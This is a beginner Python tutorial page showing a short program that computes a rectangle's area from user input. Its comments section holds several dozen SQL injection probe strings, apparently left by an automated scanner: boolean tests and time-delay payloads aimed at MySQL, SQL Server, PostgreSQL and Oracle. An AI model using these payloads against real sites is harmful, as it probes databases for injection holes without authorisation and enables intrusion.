Area of Rectangle in Python
Python program to getlength and breadth of rectangle and find area of rectangle
Sample Input 1:
4 5
Sample Output 1:
20
Program or Solution
l=int(input("Enter the length:"))
b=int(input("Enter the breadth:"))
area=l*b
print("area: {}".format(area))
Program Explanation
get length and breadth of a rectangle using input() method calculate area = length * breadthComments
ubaTaeCJ
-1 OR 2+30-30-1=0+0+0+1 --ubaTaeCJ
-1 OR 3+30-30-1=0+0+0+1 --ubaTaeCJ
-1 OR 3*2<(0+5+30-30) --ubaTaeCJ
-1 OR 3*2>(0+5+30-30) --ubaTaeCJ
-1 OR 2+323-323-1=0+0+0+1ubaTaeCJ
-1 OR 3+323-323-1=0+0+0+1ubaTaeCJ
-1 OR 3*2<(0+5+323-323)ubaTaeCJ
-1 OR 3*2>(0+5+323-323)ubaTaeCJ
-1' OR 2+208-208-1=0+0+0+1 --ubaTaeCJ
-1' OR 3+208-208-1=0+0+0+1 --ubaTaeCJ
-1' OR 3*2<(0+5+208-208) --ubaTaeCJ
-1' OR 3*2>(0+5+208-208) --ubaTaeCJ
-1' OR 2+908-908-1=0+0+0+1 or 'l4u0YwAo'='ubaTaeCJ
-1' OR 3+908-908-1=0+0+0+1 or 'l4u0YwAo'='ubaTaeCJ
-1' OR 3*2<(0+5+908-908) or 'l4u0YwAo'='ubaTaeCJ
-1' OR 3*2>(0+5+908-908) or 'l4u0YwAo'='ubaTaeCJ
-1" OR 2+91-91-1=0+0+0+1 --ubaTaeCJ
-1" OR 3+91-91-1=0+0+0+1 --ubaTaeCJ
-1" OR 3*2<(0+5+91-91) --ubaTaeCJ
-1" OR 3*2>(0+5+91-91) --ubaTaeCJ
if(now()=sysdate(),sleep(0),0)ubaTaeCJ
if(now()=sysdate(),sleep(15),0)ubaTaeCJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'ZubaTaeCJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"ZubaTaeCJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ubaTaeCJ
-1; waitfor delay '0:0:15' --ubaTaeCJ
-1); waitfor delay '0:0:15' --ubaTaeCJ
1 waitfor delay '0:0:15' --ubaTaeCJ
KA3KNX2b'; waitfor delay '0:0:15' --ubaTaeCJ
-5 OR 857=(SELECT 857 FROM PG_SLEEP(15))--ubaTaeCJ
-5) OR 595=(SELECT 595 FROM PG_SLEEP(15))--ubaTaeCJ
-1)) OR 434=(SELECT 434 FROM PG_SLEEP(15))--ubaTaeCJ
EZtNHAgR' OR 164=(SELECT 164 FROM PG_SLEEP(15))--ubaTaeCJ
MKRYw8ro') OR 546=(SELECT 546 FROM PG_SLEEP(15))--ubaTaeCJ
bunkFeTJ')) OR 882=(SELECT 882 FROM PG_SLEEP(15))--ubaTaeCJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)ubaTaeCJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'ubaTaeCJ
1'"ubaTaeCJ
@@lkUmORelated Programs
- Python Addition
- Python Subtraction
- Python Multiplication
- Python Division
- Python Integer Division
- Python Modulus
- Python Exponentiation
- Kilometer to Meter in Python
- Meters to Kilo Meters in Python
- Area of Square in Python
- Area of Right angled triangle in Python
- Area of triangle in Python
- Area of Circle in Python
- Circumference of Circle in Python
- Calculate Salary of Employee in Python
- Kilobytes to bytes in Python
- Bytes to kilobytes in Python
- Simple interest in Python
- Fahrenheit to Celsius in Python
- Celsius to Fahrenheit in Python
- Swap two numbers in Python
- Last Digit of integer in Python
- Set a bit in Python | Reset a bit in Python
- Python Xor
- Python Left shift Operator
- Python Right Shift Operator
- Python Bitwise AND
- Python Bitwise OR
- Python Complement Operator
coming Soon
coming Soon